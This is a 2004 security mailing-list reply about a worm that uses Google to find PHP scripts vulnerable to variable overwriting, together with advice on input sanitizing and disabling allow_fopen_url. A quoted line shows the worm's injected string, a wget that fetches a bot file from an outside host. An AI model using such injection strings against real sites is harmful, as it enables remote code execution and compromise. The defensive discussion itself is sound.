On Sat, 25 Dec 2004, Pekka Savola wrote:

> On Sat, 25 Dec 2004, Juergen Schmidt wrote:
> > It uses the brasilian Google site to find all kinds of PHP skripts.
> > It parses their URLs and overwrites variables with strings like:
> >
> > 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
> > www.visualcoders.net/spybot.txt;...
> And AFAICS, this can be prevented by setting register_globals=off in
> php.ini.

Nope -- this only prevents internal variables from being modified by
attackers. As the variable is being listed in search engines, you want to
set them from external parameters. So you have to sanitize them.

Disabling allow_fopen_url protects you against this attack (not against
spying on local files though).

bye, ju

Juergen Schmidt       Chefredakteur  heise Security     www.heisec.de
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